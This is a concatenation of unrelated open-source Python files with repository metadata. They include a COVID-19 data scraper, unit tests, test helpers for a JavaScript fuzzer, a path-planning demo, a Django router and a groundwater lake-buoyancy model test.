listener = eventlet.listen(conn) print('listening on {0}:{1}'.format(*conn)) try: eventlet.wsgi.server(listener, root_app_handler) except KeyboardInterrupt: pass def start_default(interface, port, allow_unsafe=False, root_app_cls=DefaultRootApp): root_app = root_app_cls() root_app.allow_unsafe = allow_unsafe start(interface, port, root_app.handler) def main(): args = make_parser().parse_args() start_default(args.listen, args.port, args.unsafe) def get_static_folder(): path_root = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../client') path_root = os.path.join(path_root, config.CLIENT_DIR) return os.path.abspath(path_root) app = make_app() if __name__ == '__main__': main()
31.261146
115
0.647514
2,747
0.559698
0
0
194
0.039527
0
0
610
0.124287
bea71c525e82317994bbd637b8bebff771fe81eb
3,406
py
Python
tests/unit/test_roger_promote.py
seomoz/roger-mesos-tools
88b4cb3550a4b49d0187cfb5e6a22246ff6b9765
[ "Apache-2.0" ]
null
null
null
tests/unit/test_roger_promote.py
seomoz/roger-mesos-tools
88b4cb3550a4b49d0187cfb5e6a22246ff6b9765
[ "Apache-2.0" ]
47
2016-05-26T22:09:56.000Z
2018-08-08T20:33:39.000Z
tests/unit/test_roger_promote.py
seomoz/roger-mesos-tools
88b4cb3550a4b49d0187cfb5e6a22246ff6b9765
[ "Apache-2.0" ]
3
2017-09-20T22:39:03.000Z
2017-11-07T22:29:29.000Z
# -*- encoding: utf-8 -*- """ Unit test for roger_promote.py """ import tests.helper import unittest import os import os.path import pytest import requests from mockito import mock, Mock, when from cli.roger_promote import RogerPromote from cli.appconfig import AppConfig from cli.settings import Settings from cli.framework import Framework from cli.frameworkUtils import FrameworkUtils from cli.marathon import Marathon from cli.chronos import Chronos class TestRogerPromote(unittest.TestCase): def setUp(self): self.marathon = mock(Marathon) self.settings = mock(Settings) self.app_config = mock(AppConfig) self.framework = self.marathon self.framework_utils = mock(FrameworkUtils) self.config_file = "test.yml" self.roger_env = {} os.environ['ROGER_CONFIG_DIR'] = '/vagrant/config' @property def config_dir(self): return os.environ['ROGER_CONFIG_DIR'] def test_config_dir(self): rp = RogerPromote() assert rp.config_dir == '/vagrant/config' def test_roger_env(self): fake_config = tests.helper.fake_config() settings = mock(Settings) when(self.app_config).getRogerEnv( self.config_dir ).thenReturn(fake_config) rp = RogerPromote(app_config=self.app_config) assert rp.roger_env == fake_config def test_set_framework(self): app_data = {'test_app': {'name': 'test_app'}} when(self.app_config).getAppData( self.config_dir, self.config_file, 'test_app' ).thenReturn(app_data) rp = RogerPromote(app_config=self.app_config) rp._set_framework(self.config_file, 'test_app') assert rp._framework.getName() == 'Marathon' def test_image_name(self): os.environ['ROGER_USER'] = "first.last" os.environ['ROGER_USER_PASS_DEV'] = "password" os.environ['ROGER_USER_PASS_STAGE'] = "password" os.environ['ROGER_USER_PASS_PROD'] = "password" framework = mock(Marathon) when(framework).getName().thenReturn("Marathon") when(framework).get_app_id( "test_path/test_app.json", "Marathon" ).thenReturn("app_id") when(framework).get_image_name( 'first.last', "password", "dev", "app_id", self.config_dir, self.config_file ).thenReturn("test_image") rp = RogerPromote(framework=framework) assert rp._image_name( 'dev', self.config_file, "test_path/test_app.json") == 'test_image' def test_config_resolver(self): framework = mock(Framework) settings = mock(Settings) app_config = mock(AppConfig) config_dir = '/vagrant/config' fake_team_config = tests.helper.fake_team_config() when(settings).getConfigDir().thenReturn(config_dir) when(app_config).getConfig( config_dir, 'roger.json' ).thenReturn(fake_team_config) rp = RogerPromote(settings=settings, app_config=app_config) val = rp._config_resolver('template_path', 'test_app', 'roger.json') assert val == 'framework_template_path' def test_roger_push_script(self): path = RogerPromote()._roger_push_script() assert 'roger-mesos-tools/cli/roger_push.py' in path
28.383333
76
0.645919
2,942
0.86377
0
0
81
0.023782
0
0
590
0.173224
bea77828d8025fc0087d40bc8239898137482a39
7,097
py
Python
data/collectors.py
papb/COVID-19
2dc8e683f55c494ca894727aca56f90e53b161f3
[ "MIT" ]
6
2020-03-24T22:03:34.000Z
2020-03-25T21:08:02.000Z
data/collectors.py
papb/COVID-19
2dc8e683f55c494ca894727aca56f90e53b161f3
[ "MIT" ]
null
null
null
data/collectors.py
papb/COVID-19
2dc8e683f55c494ca894727aca56f90e53b161f3
[ "MIT" ]
1
2020-03-27T20:25:03.000Z
2020-03-27T20:25:03.000Z
import json import pandas as pd import requests def load_dump_covid_19_data(): COVID_19_BY_CITY_URL='https://raw.githubusercontent.com/wcota/covid19br/master/cases-brazil-cities-time.csv' by_city=(pd.read_csv(COVID_19_BY_CITY_URL) .query('country == "Brazil"') .drop(columns=['country']) .pipe(lambda df: df[df.state!='TOTAL']) .assign(city=lambda df: df.city.apply(lambda x: x.split('/')[0])) .rename(columns={'totalCases': 'cases', 'newCases': 'new_cases', 'state': 'uf'}) .sort_values(by=['city', 'date']) ) by_uf = (by_city .groupby(['date', 'uf']) ['new_cases', 'cases'] .sum() .reset_index()) dfs = [by_uf, by_city] filenames = ['by_uf', 'by_city'] for df, filename in zip(dfs, filenames): output_path = f'data/csv/covid_19/{filename}/{filename}.csv' df.to_csv(output_path, index=False) print(f'{filename} data exported to {output_path}') def load_dump_uf_pop(): IBGE_POPULATION_EXCEL_URL = 'ftp://ftp.ibge.gov.br/Estimativas_de_Populacao/Estimativas_2019/estimativa_dou_2019.xls' def _load_uf_codes(): print('Scraping UF codes') return ( pd.read_html( 'https://www.oobj.com.br/bc/article/' 'quais-os-c%C3%B3digos-de-cada-uf-no-brasil-465.html' ) [0] .replace('\s\(\*\)', '', regex=True) .rename(columns={'UF': 'uf'}) [['Unidade da Federação', 'uf']] ) def _load_uf_capitals(): print('Scraping UF capital names') return ( pd.read_html( 'https://www.estadosecapitaisdobrasil.com/' ) [0] .rename(columns={'Sigla': 'uf', 'Capital': 'city'}) [['uf', 'city']] ) # TODO: download excel file only once def _download_ibge_excel_file(url): pass def _load_city_pop(): print('Scraping city population') return ( pd.read_excel(IBGE_POPULATION_EXCEL_URL, sheet_name='Municípios', header=1) .rename(columns={ 'COD. UF': 'UF_code', 'COD. MUNIC': 'city_code', 'NOME DO MUNICÍPIO': 'city', 'POPULAÇÃO ESTIMADA': 'estimated_population' }) .dropna(how='any') .assign(estimated_population=lambda df: df.estimated_population .replace('\.', '', regex=True) .replace('\-', ' ', regex=True) .replace('\(\d+\)', '', regex=True) .astype('int') ) .assign( UF_code=lambda df: df.UF_code.astype(int)) .assign(city_code=lambda df: df.city_code.astype(int)) .rename(columns={'UF': 'uf'}) [['uf', 'city', 'estimated_population']] ) def _load_uf_pop(): print('Scraping UF population') uf_codes = _load_uf_codes() return ( pd.read_excel(IBGE_POPULATION_EXCEL_URL, header=1) .drop(columns=['Unnamed: 1']) .rename(columns={'POPULAÇÃO ESTIMADA': 'estimated_population'}) .dropna(how='any') .assign(estimated_population=lambda df: df.estimated_population .replace('\.', '', regex=True) .replace('\-', ' ', regex=True) .replace('\(\d\)', '', regex=True) .astype('int') ) .pipe(lambda df: pd.merge(df, uf_codes, left_on='BRASIL E UNIDADES DA FEDERAÇÃO', right_on='Unidade da Federação', how='inner')) [['uf', 'estimated_population']] ) uf_pop, city_pop, uf_capitals = (_load_uf_pop(), _load_city_pop(), _load_uf_capitals()) print('Combining uf and city data') uf_pop = ( uf_pop # Add capital city name .merge( uf_capitals, how='left', on='uf' ) # Add capital population .merge( city_pop, how='left', on=['uf', 'city'] ) .rename( columns={ 'estimated_population_x': 'estimated_population', 'estimated_population_y': 'capital_estimated_population' } ) ) dfs = [uf_pop, city_pop] filenames = ['by_uf', 'by_city'] for df, filename in zip(dfs, filenames): output_path = f'data/csv/population/{filename}/{filename}.csv' df.to_csv(output_path, index=False) print(f'{filename} data exported to {output_path}') def load_jh_df(csv): ''' Loads a CSV file from JH repository and make some transforms ''' jh_data_path = ( 'https://raw.githubusercontent.com/' 'CSSEGISandData/COVID-19/master/' 'csse_covid_19_data/csse_covid_19_time_series/' ) return ( pd.read_csv( jh_data_path + csv[1] ) .drop(['Lat', 'Long'], axis=1) .groupby('Country/Region') .sum() .reset_index() .rename( columns={'Country/Region':'country'} ) .melt( id_vars=['country'], var_name='date', value_name=csv[0] ) .assign( date=lambda x: pd.to_datetime( x['date'], format='%m/%d/%y' ) ) ) def load_jh_data(): ''' Loads the latest COVID-19 global data from Johns Hopkins University repository ''' cases_csv = ('cases', 'time_series_19-covid-Confirmed.csv') deaths_csv = ('deaths', 'time_series_19-covid-Deaths.csv') recovered_csv = ('recoveries', 'time_series_19-covid-Recovered.csv') return ( pd.merge( pd.merge( load_jh_df(cases_csv), load_jh_df(deaths_csv) ), load_jh_df(recovered_csv) ) .reindex( columns = ['date', 'cases', 'deaths', 'recoveries', 'country'] ) ) if __name__ == '__main__': try: load_dump_covid_19_data() except Exception as e: print(f'Error when collecting COVID-19 cases data: {repr(e)}') try: load_dump_uf_pop() except Exception as e: print(f'Error when collecting population data: {repr(e)}')
32.856481
121
0.479217
0
0
0
0
0
0
0
0
2,113
0.297229
bea7f47e5f837c85a165df266359f1d2def3dfcd
5,976
py
Python
testsuite/testsuite_helpers.py
freingruber/JavaScript-Raider
d1c1fff2fcfc60f210b93dbe063216fa1a83c1d0
[ "Apache-2.0" ]
91
2022-01-24T07:32:34.000Z
2022-03-31T23:37:15.000Z
testsuite/testsuite_helpers.py
zeusguy/JavaScript-Raider
d1c1fff2fcfc60f210b93dbe063216fa1a83c1d0
[ "Apache-2.0" ]
null
null
null
testsuite/testsuite_helpers.py
zeusguy/JavaScript-Raider
d1c1fff2fcfc60f210b93dbe063216fa1a83c1d0
[ "Apache-2.0" ]
11
2022-01-24T14:21:12.000Z
2022-03-31T23:37:23.000Z
import config as cfg import utils import native_code.executor as executor number_performed_tests = 0 expectations_correct = 0 expectations_wrong = 0 def reset_stats(): global number_performed_tests, expectations_correct, expectations_wrong number_performed_tests = 0 expectations_correct = 0 expectations_wrong = 0 def get_number_performed_tests(): global number_performed_tests return number_performed_tests def get_expectations_correct(): global expectations_correct return expectations_correct def get_expectations_wrong(): global expectations_wrong return expectations_wrong def assert_success(result): global number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.SUCCESS: utils.msg("[-] ERROR: Returned status was not SUCCESS") raise Exception() def assert_crash(result): global number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.CRASH: utils.msg("[-] ERROR: Returned status was not CRASH") raise Exception() def assert_exception(result): global number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.EXCEPTION_THROWN and result.status != executor.Execution_Status.EXCEPTION_CRASH: utils.msg("[-] ERROR: Returned status was not EXCEPTION") raise Exception() def assert_timeout(result): global number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.TIMEOUT: utils.msg("[-] ERROR: Returned status was not TIMEOUT") raise Exception() def assert_output_equals(result, expected_output): global number_performed_tests number_performed_tests += 1 if result.output.strip() != expected_output.strip(): utils.msg("[-] ERROR: Returned output (%s) was not correct (%s)" % (result.output.strip(), expected_output)) raise Exception() def execute_program(code_to_execute): cfg.exec_engine.restart_engine() result = cfg.exec_engine.execute_safe(code_to_execute) return result def restart_exec_engine(): cfg.exec_engine.restart_engine() def execute_program_from_restarted_engine(code_to_execute): restart_exec_engine() return execute_program(code_to_execute) def assert_int_value_equals(value_real, value_expected, error_msg): global number_performed_tests number_performed_tests += 1 if value_real == value_expected: return # Test PASSED utils.msg("[-] ERROR: %s (expected: %d ,real: %d)" % (error_msg, value_expected, value_real)) # In this case I throw an exception to stop execution because speed optimized functions must always be correct raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed def assert_string_value_equals(string_real, string_expected, error_msg): global number_performed_tests number_performed_tests += 1 if string_real == string_expected: return # Test PASSED print("[-] ERROR: %s (expected: %s ,real: %s)" % (error_msg, string_expected, string_real)) # In this case I throw an exception to stop execution because speed optimized functions must always be correct raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed def assert_no_new_coverage(result): global number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.SUCCESS: utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS raise Exception() if result.num_new_edges == 0: return # test PASSED print("[-] ERROR: Found new coverage (%d) but expected that there is no new coverage!" % result.num_new_edges) # In this case I throw an exception to stop execution because speed optimized functions must always be correct raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed def assert_new_coverage(result): global number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.SUCCESS: utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS raise Exception() if result.num_new_edges != 0: return # test PASSED print("[-] ERROR: Found no new coverage but there should be one!") # In this case I throw an exception to stop execution because speed optimized functions must always be correct raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed # The expect functions don't throw an exception like the assert_* functions # Instead, they just count how often the expected result was true def expect_no_new_coverage(result): global expectations_correct, expectations_wrong, number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.SUCCESS: utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS raise Exception() if result.num_new_edges == 0: expectations_correct += 1 else: expectations_wrong += 1 # The expect functions don't throw an exception like the assert_* functions # Instead, they just count how often the expected result was true def expect_new_coverage(result): global expectations_correct, expectations_wrong, number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.SUCCESS: utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS raise Exception() if result.num_new_edges != 0: expectations_correct += 1 else: expectations_wrong += 1
34.947368
130
0.737784
0
0
0
0
0
0
0
0
1,933
0.323461
bea8a3765c24aad74f039b0b081e005d38797cfe
99
py
Python
examples/my_configs/two.py
davidhyman/override
e34bd3c8676233439de5c002367b3bff5c1b88d6
[ "MIT" ]
null
null
null
examples/my_configs/two.py
davidhyman/override
e34bd3c8676233439de5c002367b3bff5c1b88d6
[ "MIT" ]
1
2017-07-11T22:03:27.000Z
2017-07-11T22:03:27.000Z
examples/my_configs/two.py
davidhyman/override
e34bd3c8676233439de5c002367b3bff5c1b88d6
[ "MIT" ]
null
null
null
from .one import * fruit = 'banana' colour = 'orange' sam['eggs'] = 'plenty' sam.pop('ham')
14.142857
23
0.585859
0
0
0
0
0
0
0
0
35
0.353535
bea8aa6132f2274610cc25a57ec0c74c8765342d
371
py
Python
students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py
aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022
a63691317a72fb9b29ae537bc3d7766661458c22
[ "MIT" ]
null
null
null
students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py
aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022
a63691317a72fb9b29ae537bc3d7766661458c22
[ "MIT" ]
null
null
null
students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py
aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022
a63691317a72fb9b29ae537bc3d7766661458c22
[ "MIT" ]
null
null
null
from django.urls import path, include from rest_framework_jwt.views import obtain_jwt_token from rest_framework.routers import DefaultRouter from .views import NoteViewSet app_name = 'api' router = DefaultRouter(trailing_slash=False) router.register('notes', NoteViewSet) urlpatterns = [ path('jwt-auth/', obtain_jwt_token), path('', include(router.urls)), ]
23.1875
53
0.77628
0
0
0
0
0
0
0
0
25
0.067385
beaa8784fc43c71bc8bb5120744ac9a157c4e2a7
2,387
py
Python
PathPlanning/run.py
CandleStein/VAlg
43aecdd351954d316f132793cf069b70bf2e5cc2
[ "MIT" ]
null
null
null
PathPlanning/run.py
CandleStein/VAlg
43aecdd351954d316f132793cf069b70bf2e5cc2
[ "MIT" ]
null
null
null
PathPlanning/run.py
CandleStein/VAlg
43aecdd351954d316f132793cf069b70bf2e5cc2
[ "MIT" ]
1
2020-09-25T18:31:34.000Z
2020-09-25T18:31:34.000Z
from planning_framework import path import cv2 as cv import numpy as np import argparse import matplotlib.pyplot as plt parser = argparse.ArgumentParser(description="Path Planning Visualisation") parser.add_argument( "-n", "--n_heuristic", default=2, help="Heuristic for A* Algorithm (default = 2). 0 for Dijkstra's Algorithm", ) args = parser.parse_args() N_H = int(args.n_heuristic) drawing = False # true if mouse is pressed mode = "obs" # if True, draw rectangle. Press 'm' to toggle to curve ix, iy = -1, -1 sx, sy = 0, 0 dx, dy = 50, 50 # mouse callback function def draw(event, x, y, flags, param): global mode, sx, sy, dx, dy, drawing if event == cv.EVENT_LBUTTONDOWN: drawing = True elif event == cv.EVENT_MOUSEMOVE: if drawing == True: if mode == "obs": cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1) elif event == cv.EVENT_LBUTTONUP: drawing = False if mode == "obs": cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1) elif mode == "src": cv.circle(img, (x, y), 5, (255, 0, 0), -1) sx, sy = x, y elif mode == "dst": cv.circle(img, (x, y), 5, (0, 255, 0), -1) dx, dy = x, y img = np.zeros((512, 512, 3), np.uint8) inv_im = np.ones(img.shape) * 255 cv.namedWindow("Draw the Occupancy Map") cv.setMouseCallback("Draw the Occupancy Map", draw) while 1: cv.imshow("Draw the Occupancy Map", inv_im - img) if cv.waitKey(20) & 0xFF == 27: break cv.destroyAllWindows() mode = "src" img_ = img cv.namedWindow("Set the Starting Point") cv.setMouseCallback("Set the Starting Point", draw) while 1: cv.imshow("Set the Starting Point", inv_im - img) if cv.waitKey(20) & 0xFF == 27: break # cv.waitKey(20) cv.destroyAllWindows() mode = "dst" end = "Set the End Point" cv.namedWindow(end) cv.setMouseCallback(end, draw) while cv.getWindowProperty(end, 0) >= 0: cv.imshow(end, inv_im - img) if cv.waitKey(20) & 0xFF == 27: break cv.destroyAllWindows() img = cv.resize(img_, (50, 50), interpolation=cv.INTER_AREA) inv_img = np.ones(img.shape) np.savetxt("map.txt", np.array(img[:, :, 0])) plt.imshow(inv_img - img) start = np.array([sx, sy]) * 50 // 512 end = np.array([dx, dy]) * 50 // 512 path(start, end, N_H)
26.820225
86
0.607038
0
0
0
0
0
0
0
0
447
0.187264
beaf6a34e9709a7f3a490a80d9b84b4126151d38
186
py
Python
Codeforces/problems/0136/A/136A.py
object-oriented-human/competitive
9e761020e887d8980a39a64eeaeaa39af0ecd777
[ "MIT" ]
2
2021-07-27T10:46:47.000Z
2021-07-27T10:47:57.000Z
Codeforces/problems/0136/A/136A.py
foooop/competitive
9e761020e887d8980a39a64eeaeaa39af0ecd777
[ "MIT" ]
null
null
null
Codeforces/problems/0136/A/136A.py
foooop/competitive
9e761020e887d8980a39a64eeaeaa39af0ecd777
[ "MIT" ]
null
null
null
n = int(input()) line = list(map(int, input().split())) l = {} res = "" for i, j in enumerate(line): l[j] = i+1 for k in range(n): res += str(l[k+1]) + " " print(res.rstrip())
15.5
38
0.516129
0
0
0
0
0
0
0
0
5
0.026882
beb013240bc0b9610971205973878d44dedde94f
323
py
Python
generatey.py
YiLisa/DSCI560-hw2
9cf4a40a6e4755ea1b0b68248e553fb4b6b7fdf4
[ "Apache-2.0" ]
null
null
null
generatey.py
YiLisa/DSCI560-hw2
9cf4a40a6e4755ea1b0b68248e553fb4b6b7fdf4
[ "Apache-2.0" ]
null
null
null
generatey.py
YiLisa/DSCI560-hw2
9cf4a40a6e4755ea1b0b68248e553fb4b6b7fdf4
[ "Apache-2.0" ]
null
null
null
import pandas as pd def main(): input = pd.read_csv('random_x.csv', header=None) x=input[0].tolist() y = [] for n in x: y.append(3*int(n)+6) df = pd.DataFrame(y) df.to_csv('output_y.csv', index=False, header=False) if __name__ == '__main__': main() print('generating y = 3x+6...')
21.533333
56
0.582043
0
0
0
0
0
0
0
0
62
0.19195
beb0a9e7bb5a51ebb9a999b6f45ac4bb5d9df106
1,002
py
Python
setup.py
burn874/mtg
cef47f6ec0ca110bdcb885ec09d6f5aca517c3b2
[ "Apache-2.0" ]
null
null
null
setup.py
burn874/mtg
cef47f6ec0ca110bdcb885ec09d6f5aca517c3b2
[ "Apache-2.0" ]
null
null
null
setup.py
burn874/mtg
cef47f6ec0ca110bdcb885ec09d6f5aca517c3b2
[ "Apache-2.0" ]
null
null
null
import re from pkg_resources import parse_requirements import pathlib from setuptools import find_packages, setup README_FILE = 'README.md' REQUIREMENTS_FILE = 'requirements.txt' VERSION_FILE = 'mtg/_version.py' VERSION_REGEXP = r'^__version__ = \'(\d+\.\d+\.\d+)\'' r = re.search(VERSION_REGEXP, open(VERSION_FILE).read(), re.M) if r is None: raise RuntimeError(f'Unable to find version string in {VERSION_FILE}.') version = r.group(1) long_description = open(README_FILE, encoding='utf-8').read() install_requires = [str(r) for r in parse_requirements(open(REQUIREMENTS_FILE, 'rt'))] setup( name='mtg', version=version, description='mtg is a collection of data science and ml projects for Magic:the Gathering', long_description=long_description, long_description_content_type='text/markdown', author='Ryan Saxe', author_email='[email protected]', url='https://github.com/RyanSaxe/mtg', packages=find_packages(), install_requires=install_requires, )
31.3125
94
0.739521
0
0
0
0
0
0
0
0
307
0.306387
beb1a4b08f2fc3818a575158bc7a69b7e5f252c7
1,399
py
Python
avilla/core/resource/interface.py
RF-Tar-Railt/Avilla
0b6eff0e253d4c04a5c82f4f252b6a11b7d81e04
[ "MIT" ]
null
null
null
avilla/core/resource/interface.py
RF-Tar-Railt/Avilla
0b6eff0e253d4c04a5c82f4f252b6a11b7d81e04
[ "MIT" ]
1
2021-12-19T07:43:30.000Z
2021-12-19T07:43:30.000Z
avilla/core/resource/interface.py
RF-Tar-Railt/Avilla
0b6eff0e253d4c04a5c82f4f252b6a11b7d81e04
[ "MIT" ]
null
null
null
from __future__ import annotations from dataclasses import dataclass from avilla.core.platform import Base from avilla.core.resource import Resource, ResourceProvider @dataclass class ResourceMatchPrefix: resource_type: type[Resource] keypath: str | None = None platform: Base | None = None class ResourceInterface: providers: dict[ResourceMatchPrefix, ResourceProvider] def __init__(self): self.providers = {} def register( self, resource_type: type[Resource], provider: ResourceProvider, *, mainline_keypath: str | None = None, platform: Base | None = None, ): self.providers[ResourceMatchPrefix(resource_type, mainline_keypath, platform)] = provider def get_provider( self, resource: Resource | type[Resource], *, mainline_keypath: str | None = None, platform: Base | None = None, ) -> ResourceProvider | None: resource_type = resource if isinstance(resource, type) else type(resource) for prefix in self.providers: if all(( prefix.resource_type is resource_type, prefix.keypath == mainline_keypath if prefix.keypath is not None else True, prefix.platform == platform if prefix.platform is not None else True )): return self.providers[prefix]
29.765957
97
0.647605
1,213
0.867048
0
0
135
0.096497
0
0
0
0
beb313eb5f64fc657c1686ad77dc2225b87a4889
570
py
Python
viewer_examples/plugins/median_filter.py
atemysemicolon/scikit-image
a48cf5822f9539c6602b9327c18253aed14fa692
[ "BSD-3-Clause" ]
null
null
null
viewer_examples/plugins/median_filter.py
atemysemicolon/scikit-image
a48cf5822f9539c6602b9327c18253aed14fa692
[ "BSD-3-Clause" ]
null
null
null
viewer_examples/plugins/median_filter.py
atemysemicolon/scikit-image
a48cf5822f9539c6602b9327c18253aed14fa692
[ "BSD-3-Clause" ]
null
null
null
from skimage import data from skimage.filter.rank import median from skimage.morphology import disk from skimage.viewer import ImageViewer from skimage.viewer.widgets import Slider, OKCancelButtons, SaveButtons from skimage.viewer.plugins.base import Plugin def median_filter(image, radius): return median(image, selem=disk(radius)) image = data.coins() viewer = ImageViewer(image) plugin = Plugin(image_filter=median_filter) plugin += Slider('radius', 2, 10, value_type='int') plugin += SaveButtons() plugin += OKCancelButtons() viewer += plugin viewer.show()
25.909091
71
0.784211
0
0
0
0
0
0
0
0
13
0.022807
beb317bf51c8d955452bb7ade64a00caeb647030
8,722
py
Python
autotest/test_gwf_buy_lak01.py
scharlton2/modflow6
83ac72ee3b6f580aaffef6352cf15c1697d3ce66
[ "CC0-1.0" ]
3
2019-07-10T21:16:57.000Z
2021-10-08T00:56:20.000Z
autotest/test_gwf_buy_lak01.py
scharlton2/modflow6
83ac72ee3b6f580aaffef6352cf15c1697d3ce66
[ "CC0-1.0" ]
null
null
null
autotest/test_gwf_buy_lak01.py
scharlton2/modflow6
83ac72ee3b6f580aaffef6352cf15c1697d3ce66
[ "CC0-1.0" ]
3
2019-11-28T16:26:50.000Z
2020-02-05T11:08:37.000Z
# Test the buoyancy package and the variable density flows between the lake # and the gwf model. This model has 4 layers and a lake incised within it. # The model is transient and has heads in the aquifer higher than the initial # stage in the lake. As the model runs, the lake and aquifer equalize and # should end up at the same level. The test ensures that the initial and # final water volumes in the entire system are the same. There are three # different cases: # 1. No buoyancy package # 2. Buoyancy package with lake and aquifer density = 1000. # 3. Buoyancy package with lake and aquifer density = 1024.5 import os import pytest import sys import numpy as np try: import flopy except: msg = "Error. FloPy package is not available.\n" msg += "Try installing using the following command:\n" msg += " pip install flopy" raise Exception(msg) from framework import testing_framework from simulation import Simulation ex = ["buy_lak_01a"] # , 'buy_lak_01b', 'buy_lak_01c'] buy_on_list = [False] # , True, True] concbuylist = [0.0] # , 0., 35.] exdirs = [] for s in ex: exdirs.append(os.path.join("temp", s)) def build_model(idx, dir): lx = 7.0 lz = 4.0 nlay = 4 nrow = 1 ncol = 7 nper = 1 delc = 1.0 delr = lx / ncol delz = lz / nlay top = 4.0 botm = [3.0, 2.0, 1.0, 0.0] perlen = [10.0] nstp = [50] tsmult = [1.0] Kh = 1.0 Kv = 1.0 tdis_rc = [] for i in range(nper): tdis_rc.append((perlen[i], nstp[i], tsmult[i])) nouter, ninner = 700, 300 hclose, rclose, relax = 1e-8, 1e-6, 0.97 name = ex[idx] # build MODFLOW 6 files ws = dir sim = flopy.mf6.MFSimulation( sim_name=name, version="mf6", exe_name="mf6", sim_ws=ws ) # create tdis package tdis = flopy.mf6.ModflowTdis( sim, time_units="DAYS", nper=nper, perioddata=tdis_rc ) # create gwf model gwfname = "gwf_" + name gwf = flopy.mf6.ModflowGwf(sim, modelname=gwfname, newtonoptions="NEWTON") imsgwf = flopy.mf6.ModflowIms( sim, print_option="ALL", outer_dvclose=hclose, outer_maximum=nouter, under_relaxation="NONE", inner_maximum=ninner, inner_dvclose=hclose, rcloserecord=rclose, linear_acceleration="BICGSTAB", scaling_method="NONE", reordering_method="NONE", relaxation_factor=relax, filename="{}.ims".format(gwfname), ) idomain = np.full((nlay, nrow, ncol), 1) idomain[0, 0, 1:6] = 0 idomain[1, 0, 2:5] = 0 idomain[2, 0, 3:4] = 0 dis = flopy.mf6.ModflowGwfdis( gwf, nlay=nlay, nrow=nrow, ncol=ncol, delr=delr, delc=delc, top=top, botm=botm, idomain=idomain, ) # initial conditions strt = np.zeros((nlay, nrow, ncol), dtype=float) strt[0, 0, :] = 3.5 strt[1, 0, :] = 3.0 strt[1, 0, 1:6] = 2.5 strt[2, 0, :] = 2.0 strt[3, 0, :] = 1.0 ic = flopy.mf6.ModflowGwfic(gwf, strt=strt) # node property flow npf = flopy.mf6.ModflowGwfnpf( gwf, xt3doptions=False, save_flows=True, save_specific_discharge=True, icelltype=1, k=Kh, k33=Kv, ) sto = flopy.mf6.ModflowGwfsto(gwf, sy=0.3, ss=0.0, iconvert=1) c = concbuylist[idx] lake_dense = 1000.0 + 0.7 * c buy_on = buy_on_list[idx] if buy_on: pd = [(0, 0.7, 0.0, "none", "none")] buy = flopy.mf6.ModflowGwfbuy( gwf, packagedata=pd, denseref=1000.0, concentration=c ) nlakeconn = 11 # note: number of connections for this lake # pak_data = [lakeno, strt, nlakeconn, dense, boundname] pak_data = [(0, 2.25, nlakeconn, lake_dense)] connlen = delr / 2.0 connwidth = delc bedleak = "None" con_data = [ # con_data=(lakeno,iconn,(cellid),claktype,bedleak,belev,telev,connlen,connwidth ) (0, 0, (0, 0, 0), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth), (0, 1, (1, 0, 1), "VERTICAL", bedleak, 10, 10, connlen, connwidth), (0, 2, (1, 0, 1), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth), (0, 3, (2, 0, 2), "VERTICAL", bedleak, 10, 10, connlen, connwidth), (0, 4, (2, 0, 2), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth), (0, 5, (3, 0, 3), "VERTICAL", bedleak, 10, 10, connlen, connwidth), (0, 6, (2, 0, 4), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth), (0, 7, (2, 0, 4), "VERTICAL", bedleak, 10, 10, connlen, connwidth), (0, 8, (1, 0, 5), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth), (0, 9, (1, 0, 5), "VERTICAL", bedleak, 10, 10, connlen, connwidth), (0, 10, (0, 0, 6), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth), ] # period data p_data = [ (0, "STATUS", "ACTIVE"), ] # note: for specifying lake number, use fortran indexing! fname = "{}.lak.obs.csv".format(gwfname) lak_obs = { fname: [ ("lakestage", "stage", 1), ("lakevolume", "volume", 1), ("lak1", "lak", 1, 1), ("lak2", "lak", 1, 2), ("lak3", "lak", 1, 3), ("lak4", "lak", 1, 4), ("lak5", "lak", 1, 5), ("lak6", "lak", 1, 6), ("lak7", "lak", 1, 7), ("lak8", "lak", 1, 8), ("lak9", "lak", 1, 9), ("lak10", "lak", 1, 10), ("lak11", "lak", 1, 11), ], # "digits": 10, } lak = flopy.mf6.modflow.ModflowGwflak( gwf, save_flows=True, print_input=True, print_flows=True, print_stage=True, stage_filerecord="{}.lak.bin".format(gwfname), budget_filerecord="{}.lak.bud".format(gwfname), nlakes=len(pak_data), ntables=0, packagedata=pak_data, pname="LAK-1", connectiondata=con_data, perioddata=p_data, observations=lak_obs, auxiliary=["DENSITY"], ) # output control oc = flopy.mf6.ModflowGwfoc( gwf, budget_filerecord="{}.cbc".format(gwfname), head_filerecord="{}.hds".format(gwfname), headprintrecord=[("COLUMNS", 10, "WIDTH", 15, "DIGITS", 6, "GENERAL")], saverecord=[("HEAD", "ALL"), ("BUDGET", "ALL")], 